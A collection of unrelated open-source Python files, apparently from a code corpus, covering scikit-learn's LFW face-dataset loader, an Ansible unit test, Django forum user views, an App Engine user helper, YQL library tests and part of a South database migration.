h_slice, w_slice = slice_
h = (h_slice.stop - h_slice.start) / (h_slice.step or 1)
w = (w_slice.stop - w_slice.start) / (w_slice.step or 1)
if resize is not None:
resize = float(resize)
h = int(resize * h)
w = int(resize * w)
# allocate some contiguous memory to host the decoded image slices
n_faces = len(file_paths)
if not color:
faces = np.zeros((n_faces, h, w), dtype=np.float32)
else:
faces = np.zeros((n_faces, h, w, 3), dtype=np.float32)
# iterate over the collected file path to load the jpeg files as numpy
# arrays
for i, file_path in enumerate(file_paths):
if i % 1000 == 0:
logger.info("Loading face #%05d / %05d", i + 1, n_faces)
face = np.asarray(imread(file_path)[slice_], dtype=np.float32)
face /= 255.0 # scale uint8 coded colors to the [0.0, 1.0] floats
if resize is not None:
face = imresize(face, resize)
if not color:
# average the color channels to compute a gray levels
# representaion
face = face.mean(axis=2)
faces[i, ...] = face
return faces
#
# Task #1: Face Identification on picture with names
#
def _fetch_lfw_people(data_folder_path, slice_=None, color=False, resize=None,
min_faces_per_person=0):
"""Perform the actual data loading for the lfw people dataset
This operation is meant to be cached by a joblib wrapper.
"""
# scan the data folder content to retain people with more that
# `min_faces_per_person` face pictures
person_names, file_paths = [], []
for person_name in sorted(listdir(data_folder_path)):
folder_path = join(data_folder_path, person_name)
if not isdir(folder_path):
continue
paths = [join(folder_path, f) for f in listdir(folder_path)]
n_pictures = len(paths)
if n_pictures >= min_faces_per_person:
person_name = person_name.replace('_', ' ')
person_names.extend([person_name] * n_pictures)
file_paths.extend(paths)
n_faces = len(file_paths)
if n_faces == 0:
raise ValueError("min_faces_per_person=%d is too restrictive" %
min_faces_per_person)
target_names = np.unique(person_names)
target = np.searchsorted(target_names, person_names)
faces = _load_imgs(file_paths, slice_, color, resize)
# shuffle the faces with a deterministic RNG scheme to avoid having
# all faces of the same person in a row, as it would break some
# cross validation and learning algorithms such as SGD and online
# k-means that make an IID assumption
indices = np.arange(n_faces)
np.random.RandomState(42).shuffle(indices)
faces, target = faces[indices], target[indices]
return faces, target, target_names
def fetch_lfw_people(data_home=None, funneled=True, resize=0.5,
min_faces_per_person=None, color=False,
slice_=(slice(70, 195), slice(78, 172)),
download_if_missing=True):
"""Loader for the Labeled Faces in the Wild (LFW) people dataset
This dataset is a collection of JPEG pictures of famous people
collected on the internet, all details are available on the
official website:
http://vis-www.cs.umass.edu/lfw/
Each picture is centered on a single face. Each pixel of each channel
(color in RGB) is encoded by a float in range 0.0 - 1.0.
The task is called Face Recognition (or Identification): given the
picture of a face, find the name of the person given a training set
(gallery).
Parameters
----------
data_home: optional, default: None
Specify another download and cache folder for the datasets. By default
all scikit learn data is stored in '~/scikit_learn_data' subfolders.
funneled: boolean, optional, default: True
Download and use the funneled variant of the dataset.
resize: float, optional, default 0.5
Ratio used to resize the each face picture.
min_faces_per_person: int, optional, default None
The extracted dataset will only retain pictures of people that have at
least `min_faces_per_person` different pictures.
color: boolean, optional, default False
Keep the 3 RGB channels instead of averaging them to a single
gray level channel. If color is True the shape of the data has
one more dimension than than the shape with color = False.
slice_: optional
Provide a custom 2D slice (height, width) to extract the
'interesting' part of the jpeg files and avoid use statistical
correlation from the background
download_if_missing: optional, True by default
If False, raise a IOError if the data is not locally available
instead of trying to download the data from the source site.
"""
lfw_home, data_folder_path = check_fetch_lfw(
data_home=data_home, funneled=funneled,
download_if_missing=download_if_missing)
logger.info('Loading LFW people faces from %s', lfw_home)
# wrap the loader in a memoizing function that will return memmaped data
# arrays for optimal memory usage
m = Memory(cachedir=lfw_home, compress=6, verbose=0)
load_func = m.cache(_fetch_lfw_people)
# load and memoize the pairs as np arrays
faces, target, target_names = load_func(
data_folder_path, resize=resize,
min_faces_per_person=min_faces_per_person, color=color, slice_=slice_)
# pack the results as a Bunch instance
return Bunch(data=faces.reshape(len(faces), -1), images=faces,
target=target, target_names=target_names,
DESCR="LFW faces dataset")
#
# Task #2: Face Verification on pairs of face pictures
#
def _fetch_lfw_pairs(index_file_path, data_folder_path, slice_=None,
color=False, resize=None):
"""Perform the actual data loading for the LFW pairs dataset
This operation is meant to be cached by a joblib wrapper.
"""
# parse the index file to find the number of pairs to be able to allocate
# the right amount of memory before starting to decode the jpeg files
with open(index_file_path, 'rb') as index_file:
split_lines = [ln.strip().split('\t') for ln in index_file]
pair_specs = [sl for sl in split_lines if len(sl) > 2]
n_pairs = len(pair_specs)
# interating over the metadata lines for each pair to find the filename to
# decode and load in memory
target = np.zeros(n_pairs, dtype=np.int)
file_paths = list()
for i, components in enumerate(pair_specs):
if len(components) == 3:
target[i] = 1
pair = (
(components[0], int(components[1]) - 1),
(components[0], int(components[2]) - 1),
)
elif len(components) == 4:
target[i] = 0
pair = (
(components[0], int(components[1]) - 1),
(components[2], int(components[3]) - 1),
)
else:
raise ValueError("invalid line %d: %r" % (i + 1, components))
for j, (name, idx) in enumerate(pair):
person_folder = join(data_folder_path, name)
filenames = list(sorted(listdir(person_folder)))
file_path = join(person_folder, filenames[idx])
file_paths.append(file_path)
pairs = _load_imgs(file_paths, slice_, color, resize)
shape = list(pairs.shape)
n_faces = shape.pop(0)
shape.insert(0, 2)
shape.insert(0, n_faces // 2)
pairs.shape = shape
return pairs, target, np.array(['Different persons', 'Same person'])
def load_lfw_people(download_if_missing=False, **kwargs):
"""Alias for fetch_lfw_people(download_if_missing=False)
Check fetch_lfw_people.__doc__ for the documentation and parameter list.
"""
return fetch_lfw_people(download_if_missing=download_if_missing, **kwargs)
def fetch_lfw_pairs(subset='train', data_home=None, funneled=True, resize=0.5,
color=False, slice_=(slice(70, 195), slice(78, 172)),
download_if_missing=True):
"""Loader for the Labeled Faces in the Wild (LFW) pairs dataset
This dataset is a collection of JPEG pictures of famous people
collected on the internet, all details are available on the
official website:
http://vis-www.cs.umass.edu/lfw/
Each picture is centered on a single face. Each pixel of each channel
(color in RGB) is encoded by a float in range 0.0 - 1.0.
The task is called Face Verification: given a pair of two pictures,
a binary classifier must predict whether the two images are from
the same person.
In the official `README.txt`_ this task is described as the
"Restricted" task. As I am not sure as to implement the
"Unrestricted" variant correctly, I left it as unsupported for now.
.. _`README.txt`: http://vis-www.cs.umass.edu/lfw/README.txt
Parameters
----------
subset: optional, default: 'train'
Select the dataset to load: 'train' for the development training
set, 'test' for the development test set, and '10_folds' for the
official evaluation set that is meant to be used with a 10-folds
cross validation.
data_home: optional, default: None
Specify another download and cache folder for the datasets. By
default all scikit learn data is stored in '~/scikit_learn_data'
subfolders.
funneled: boolean, optional, default: True
Download and use the funneled variant of the dataset.
resize: float, optional, default 0.5
Ratio used to resize the each face picture.
color: boolean, optional, default False
Keep the 3 RGB channels instead of averaging them to a single
gray level channel. If color is True the shape of the data has
one more dimension than than the shape with color = False.
slice_: optional
Provide a custom 2D slice (height, width) to extract the
'interesting' part of the jpeg files and avoid use statistical
correlation from the background
download_if_missing: optional, True by default
If False, raise a IOError if the data is not locally available
instead of trying to download the data from the source site.
"""
lfw_home, data_folder_path = check_fetch_lfw(
data_home=data_home, funneled=funneled,
download_if_missing=download_if_missing)
logger.info('Loading %s LFW pairs from %s', subset, lfw_home)
# wrap the loader in a memoizing function that will return memmaped data
# arrays for optimal memory usage
m = Memory(cachedir=lfw_home, compress=6, verbose=0)
load_func = m.cache(_fetch_lfw_pairs)
# select the right metadata file according to the requested subset
label_filenames = {
'train': 'pairsDevTrain.txt',
'test': 'pairsDevTest.txt',
'10_folds': 'pairs.txt',
}
if subset not in label_filenames:
raise ValueError("subset='%s' is invalid: should be one of %r" % (
subset, list(sorted(label_filenames.keys()))))
index_file_path = join(lfw_home, label_filenames[subset])
# load and memoize the pairs as np arrays
pairs, target, target_names = load_func(
index_file_path, data_folder_path, resize=resize, color=color,
slice_=slice_)
# pack the results as a Bunch instance
return Bunch(data=pairs.reshape(len(pairs), -1), pairs=pairs,
target=target, target_names=target_names,
DESCR="'%s' segment of the LFW pairs dataset" % subset)
def load_lfw_pairs(download_if_missing=False, **kwargs):
"""Alias for fetch_lfw_pairs(download_if_missing=False)
Check fetch_lfw_pairs.__doc__ for the documentation and parameter list.
"""
return fetch_lfw_pairs(download_if_missing=download_if_missing, **kwargs)
| bsd-3-clause |
andmos/ansible | test/units/modules/network/ingate/test_ig_unit_information.py | 50 | 1986 | # -*- coding: utf-8 -*-
# Copyright: (c) 2018, Ingate Systems AB
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
from units.compat.mock import patch
from ansible.modules.network.ingate import ig_unit_information
from units.modules.utils import set_module_args
from .ingate_module import TestIngateModule, load_fixture
class TestUnitInformationModule(TestIngateModule):
module = ig_unit_information
def setUp(self):
super(TestUnitInformationModule, self).setUp()
self.mock_make_request = patch('ansible.modules.network.ingate.'
'ig_unit_information.make_request')
self.make_request = self.mock_make_request.start()
self.mock_is_ingatesdk_installed = patch('ansible.modules.network.ingate.'
'ig_unit_information.is_ingatesdk_installed')
self.is_ingatesdk_installed = self.mock_is_ingatesdk_installed.start()
def tearDown(self):
super(TestUnitInformationModule, self).tearDown()
self.mock_make_request.stop()
self.mock_is_ingatesdk_installed.stop()
def load_fixtures(self, fixture=None, command=None, changed=False):
self.make_request.side_effect = [load_fixture(fixture)]
self.is_ingatesdk_installed.return_value = True
def test_ig_unit_information(self):
set_module_args(
dict(
client=dict(
version='v1',
address='127.0.0.1',
scheme='http',
username='alice',
password='foobar'
)
)
)
fixture = '%s.%s' % (os.path.basename(__file__).split('.')[0], 'json')
result = self.execute_module(fixture=fixture)
self.assertTrue('unit-information' in result)
| gpl-3.0 |
hellsgate1001/thatforum_django | forumuser/views.py | 1 | 4005 | from django.conf import settings
from django.contrib.auth import get_user_model, authenticate, login as auth_login
from django.contrib.auth.forms import AuthenticationForm
from django.contrib.auth.views import login
from django.views.generic import (
ListView,
DetailView,
CreateView,
UpdateView,
FormView
)
from django.core.urlresolvers import reverse
from braces.views import LoginRequiredMixin, PermissionRequiredMixin
from thatforum.mixins import RequestForFormMixIn
from .forms import LoginForm, UserForm, ChangePasswordForm, SignupForm
class UserLogin(FormView):
form_class = AuthenticationForm
template_name = 'forumuser/forumuser_form.html'
def form_valid(self, form):
return login(self.request, template_name='users/login.html')
def get_context_data(self, **kwargs):
context = super(UserLogin, self).get_context_data(**kwargs)
context['hide_edit_password'] = True
return context
class UserViewMixin(object):
def __init__(self, *args, **kwargs):
self.model = get_user_model()
super(UserViewMixin, self).__init__(*args, **kwargs)
class UserSignupView(UserViewMixin, RequestForFormMixIn, CreateView):
form_class = SignupForm
def dispatch(self, request, *args, **kwargs):
if request.method == 'GET' and 'HTTP_REFERER' in request.META.keys():
request.session['success_url'] = request.META['HTTP_REFERER']
request.session.save()
return super(UserSignupView, self).dispatch(request, *args, **kwargs)
def get_context_data(self, **kwargs):
context = super(UserSignupView, self).get_context_data(**kwargs)
context['hide_edit_password'] = True
return context
def get_success_url(self):
if 'success_url' in self.request.META.keys():
success_url = self.request.session['success_url']
del(self.request.session['success_url'])
else:
success_url = self.object.get_absolute_url()
return success_url
def form_valid(self, form):
form.instance.set_password(form.cleaned_data.get('password1'))
form.instance.username = form.instance.email
form.instance.save()
login_user = authenticate(
username=form.instance.username,
password=form.cleaned_data.get('password1')
)
if login_user is not None:
auth_login(self.request, login_user)
return super(UserSignupView, self).form_valid(form)
class UserList(LoginRequiredMixin, UserViewMixin, ListView):
paginate_by = settings.DEFAULT_PAGINATE_BY
class UserDetail(LoginRequiredMixin, UserViewMixin, DetailView):
"""
View for displaying user details
"""
class UserUpdate(LoginRequiredMixin, PermissionRequiredMixin,
UserViewMixin, UpdateView):
"""
Edit the details for an existing user
"""
form_class = UserForm
permission_required = 'forumuser.change_user'
class UserCreate(LoginRequiredMixin, PermissionRequiredMixin,
UserViewMixin, CreateView):
"""
Create a new user
"""
form_class = UserForm
permission_required = 'forumuser.add_user'
def get_success_url(self, *args, **kwargs):
return self.object.get_absolute_url()
class UserProfile(
LoginRequiredMixin,
UserViewMixin,
RequestForFormMixIn,
UpdateView
):
"""
Allow a user to update their own details and profile
"""
form_class = UserForm
def get_object(self, queryset=None):
return self.request.user
class UserUpdatePassword(
LoginRequiredMixin,
UserViewMixin,
RequestForFormMixIn,
UpdateView
):
form_class = ChangePasswordForm
template_name = 'forumuser/changepassword_form.html'
def get_success_url(self):
return reverse('user:my_account')
def form_valid(self, form):
form.instance.set_password(form.cleaned_data.get('password1'))
return super(UserUpdatePassword, self).form_valid(form)
| mit |
vinaymavi/my-stats-appengine-api | helper/user_helper.py | 1 | 1804 | from entities.entities import Device, User
from helper.device_helper import DeviceHelper
from my_stats_messages.my_stats_messages import *
import logging
class UserHelper():
def __init__(self):
logging.info("constructor calling.")
def link_device(self, user, device):
user.devices.append(device)
user.put()
return self.get_user_by_fb_id(user.fb_id)
def create_user(self, fb_id, name, email):
users = self.get_user_by_fb_id(fb_id)
if len(users) > 0:
pass
else:
user = User(fb_id=fb_id, name=name, email=email)
user.put()
return self.get_user_by_fb_id(fb_id)
def get_user_by_fb_id(self, fb_id):
query = User.query(User.fb_id == fb_id)
return query.fetch()
def create_user_resp(self, fb_id):
users = self.get_user_by_fb_id(fb_id)
device_helper = DeviceHelper()
if len(users) > 0:
user = users[0]
user_resp = UserMessage(fb_id=user.fb_id, name=user.name, email=user.email)
if len(user.devices) > 0:
for device in user.devices:
user_resp.devices.append(device_helper.create_device_resp(device))
return user_resp
def is_device_already_registered(self, device, device_list):
is_registered = False
logging.info("****Before loop*****")
logging.info(device)
logging.info(device.device_id)
for d in device_list:
logging.info(sorted(device.device_id.split()))
logging.info(sorted(d.device_id.split()))
if sorted(device.device_id.split()) == sorted(d.device_id.split()):
logging.info("is_registered=True")
is_registered = True
return is_registered
| mit |
FurCode/RoboCop | lib/yql/tests/test_yql_object.py | 12 | 5423 | """Tests for the YQL object"""
import json
from unittest import TestCase
from nose.tools import raises
from yql import YQLObj, NotOneError
data_dict = json.loads("""{"query":{"count":"3","created":"2009-11-20T12:11:56Z","lang":"en-US","updated":"2009-11-20T12:11:56Z","uri":"http://query.yahooapis.com/v1/yql?q=select+*+from+flickr.photos.search+where+text%3D%22panda%22+limit+3","diagnostics":{"publiclyCallable":"true","url":{"execution-time":"742","content":"http://api.flickr.com/services/rest/?method=flickr.photos.search&text=panda&page=1&per_page=10"},"user-time":"745","service-time":"742","build-version":"3805"},"results":{"photo":[{"farm":"3","id":"4117944207","isfamily":"0","isfriend":"0","ispublic":"1","owner":"12346075@N00","secret":"ce1f6092de","server":"2510","title":"Pandas"},{"farm":"3","id":"4118710292","isfamily":"0","isfriend":"0","ispublic":"1","owner":"12346075@N00","secret":"649632a3e2","server":"2754","title":"Pandas"},{"farm":"3","id":"4118698318","isfamily":"0","isfriend":"0","ispublic":"1","owner":"28451051@N02","secret":"ec0b508684","server":"2586","title":"fuzzy flowers (Kalanchoe tomentosa)"}]}}}""")
data_dict2 = json.loads("""{"query":{"count":"1","created":"2009-11-20T12:11:56Z","lang":"en-US","updated":"2009-11-20T12:11:56Z","uri":"http://query.yahooapis.com/v1/yql?q=select+*+from+flickr.photos.search+where+text%3D%22panda%22+limit+3","diagnostics":{"publiclyCallable":"true","url":{"execution-time":"742","content":"http://api.flickr.com/services/rest/?method=flickr.photos.search&text=panda&page=1&per_page=10"},"user-time":"745","service-time":"742","build-version":"3805"},"results":{"photo":{"farm":"3","id":"4117944207","isfamily":"0","isfriend":"0","ispublic":"1","owner":"12346075@N00","secret":"ce1f6092de","server":"2510","title":"Pandas"}}}}""")
yqlobj = YQLObj(data_dict)
yqlobj2 = YQLObj({})
yqlobj3 = YQLObj(data_dict2)
class YQLObjTest(TestCase):
@raises(AttributeError)
def test_yql_object_one(self):
"""Test that invalid query raises AttributeError"""
yqlobj.query = 1
def test_yqlobj_uri(self):
"""Test that the query uri is as expected."""
self.assertEqual(yqlobj.uri, u"http://query.yahooapis.com/v1/yql?q=select+*+"\
"from+flickr.photos.search+where+text%3D%22panda%22+limit+3")
def test_yqlobj_query(self):
"""Test retrieval of the actual query"""
self.assertEqual(yqlobj.query, u'select * from flickr.photos.search '\
'where text="panda" limit 3')
def test_yqlobj_count(self):
"""Check we have 3 records"""
self.assertEqual(yqlobj.count, 3)
def test_yqlobj_lang(self):
"""Check the lang attr."""
self.assertEqual(yqlobj.lang, u"en-US")
def test_yqlobj_results(self):
"""Check the results."""
expected_results = {u'photo': [
{u'isfamily': u'0',
u'title': u'Pandas',
u'farm': u'3',
u'ispublic': u'1',
u'server': u'2510',
u'isfriend': u'0',
u'secret': u'ce1f6092de',
u'owner': u'12346075@N00',
u'id': u'4117944207'},
{u'isfamily': u'0',
u'title': u'Pandas',
u'farm': u'3',
u'ispublic': u'1',
u'server': u'2754',
u'isfriend': u'0',
u'secret': u'649632a3e2',
u'owner': u'12346075@N00',
u'id': u'4118710292'},
{u'isfamily': u'0',
u'title': u'fuzzy flowers (Kalanchoe tomentosa)',
u'farm': u'3',
u'ispublic': u'1',
u'server': u'2586',
u'isfriend': u'0',
u'secret': u'ec0b508684',
u'owner': u'28451051@N02',
u'id': u'4118698318'}
]}
self.assertEqual(yqlobj.results, expected_results)
def test_yqlobj_raw(self):
"""Check the raw attr."""
self.assertEqual(yqlobj.raw, data_dict.get('query'))
def test_yqlobj_diagnostics(self):
"""Check the diagnostics"""
self.assertEqual(yqlobj.diagnostics, data_dict.get('query').get('diagnostics'))
def test_query_is_none(self):
"""Check query is None with no data."""
self.assertTrue(yqlobj2.query is None)
def test_rows(self):
"""Test we can iterate over the rows."""
stuff = []
for row in yqlobj.rows:
stuff.append(row.get('server'))
self.assertEqual(stuff, [u'2510', u'2754', u'2586'])
@raises(NotOneError)
def test_one(self):
"""Test that accessing one result raises exception"""
yqlobj.one()
def test_one_with_one_result(self):
"""Test accessing data with one result."""
res = yqlobj3.one()
self.assertEqual(res.get("title"), "Pandas")
| gpl-3.0 |
dimara/synnefo | snf-astakos-app/astakos/quotaholder_app/migrations/0010_non_accepted.py | 10 | 28734 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import DataMigration
from django.db import models
class Migration(DataMigration):
depends_on = (
("im", "0058_moderation_fix"),
)
def forwards(self, orm):
pass
def backwards(self, orm):
"Write your backwards methods here."
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'im.additionalmail': {
'Meta': {'object_name': 'AdditionalMail'},
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['im.AstakosUser']"})
},
'im.approvalterms': {
'Meta': {'object_name': 'ApprovalTerms'},
'date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'db_index': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'im.astakosuser': {
'Meta': {'object_name': 'AstakosUser', '_ormbases': ['auth.User']},
'accepted_email': ('django.db.models.fields.EmailField', [], {'default': 'None', 'max_length': '75', 'null': 'True', 'blank': 'True'}),
'accepted_policy': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '255', 'null': 'True', 'blank': 'True'}),
'activation_sent': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'affiliation': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'auth_token': ('django.db.models.fields.CharField', [], {'max_length': '64', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'auth_token_created': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'auth_token_expires': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'date_signed_terms': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'deactivated_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'deactivated_reason': ('django.db.models.fields.TextField', [], {'default': 'None', 'null': 'True'}),
'disturbed_quota': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'email_verified': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'has_credits': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'has_signed_terms': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'invitations': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'is_rejected': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_verified': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'level': ('django.db.models.fields.IntegerField', [], {'default': '4'}),
'moderated': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'moderated_at': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'moderated_data': ('django.db.models.fields.TextField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'policy': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['im.Resource']", 'null': 'True', 'through': "orm['im.AstakosUserQuota']", 'symmetrical': 'False'}),
'rejected_reason': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'updated': ('django.db.models.fields.DateTimeField', [], {}),
'user_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True', 'primary_key': 'True'}),
'uuid': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'verification_code': ('django.db.models.fields.CharField', [], {'max_length': '255', 'unique': 'True', 'null': 'True'}),
'verified_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'})
},
'im.astakosuserauthprovider': {
'Meta': {'ordering': "('module', 'created')", 'unique_together': "(('identifier', 'module', 'user'),)", 'object_name': 'AstakosUserAuthProvider'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'affiliation': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '255', 'null': 'True', 'blank': 'True'}),
'auth_backend': ('django.db.models.fields.CharField', [], {'default': "'astakos'", 'max_length': '255'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'identifier': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'info_data': ('django.db.models.fields.TextField', [], {'default': "''", 'null': 'True', 'blank': 'True'}),
'module': ('django.db.models.fields.CharField', [], {'default': "'local'", 'max_length': '255'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'auth_providers'", 'to': "orm['im.AstakosUser']"})
},
'im.astakosuserquota': {
'Meta': {'unique_together': "(('resource', 'user'),)", 'object_name': 'AstakosUserQuota'},
'capacity': ('django.db.models.fields.BigIntegerField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'resource': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['im.Resource']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['im.AstakosUser']"})
},
'im.authproviderpolicyprofile': {
'Meta': {'ordering': "['priority']", 'object_name': 'AuthProviderPolicyProfile'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'authpolicy_profiles'", 'symmetrical': 'False', 'to': "orm['auth.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_exclusive': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'policy_add': ('django.db.models.fields.NullBooleanField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'policy_automoderate': ('django.db.models.fields.NullBooleanField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'policy_create': ('django.db.models.fields.NullBooleanField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'policy_limit': ('django.db.models.fields.IntegerField', [], {'default': 'None', 'null': 'True'}),
'policy_login': ('django.db.models.fields.NullBooleanField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'policy_remove': ('django.db.models.fields.NullBooleanField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'policy_required': ('django.db.models.fields.NullBooleanField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'policy_switch': ('django.db.models.fields.NullBooleanField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'priority': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
'provider': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'users': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'authpolicy_profiles'", 'symmetrical': 'False', 'to': "orm['im.AstakosUser']"})
},
'im.chain': {
'Meta': {'object_name': 'Chain'},
'chain': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'im.component': {
'Meta': {'object_name': 'Component'},
'auth_token': ('django.db.models.fields.CharField', [], {'max_length': '64', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'auth_token_created': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'auth_token_expires': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'base_url': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255', 'db_index': 'True'}),
'url': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True'})
},
'im.emailchange': {
'Meta': {'object_name': 'EmailChange'},
'activation_key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '40', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'new_email_address': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'requested_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'emailchanges'", 'unique': 'True', 'to': "orm['im.AstakosUser']"})
},
'im.endpoint': {
'Meta': {'object_name': 'Endpoint'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'service': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'endpoints'", 'to': "orm['im.Service']"})
},
'im.endpointdata': {
'Meta': {'unique_together': "(('endpoint', 'key'),)", 'object_name': 'EndpointData'},
'endpoint': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'data'", 'to': "orm['im.Endpoint']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '1024'})
},
'im.invitation': {
'Meta': {'object_name': 'Invitation'},
'code': ('django.db.models.fields.BigIntegerField', [], {'db_index': 'True'}),
'consumed': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'inviter': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'invitations_sent'", 'null': 'True', 'to': "orm['im.AstakosUser']"}),
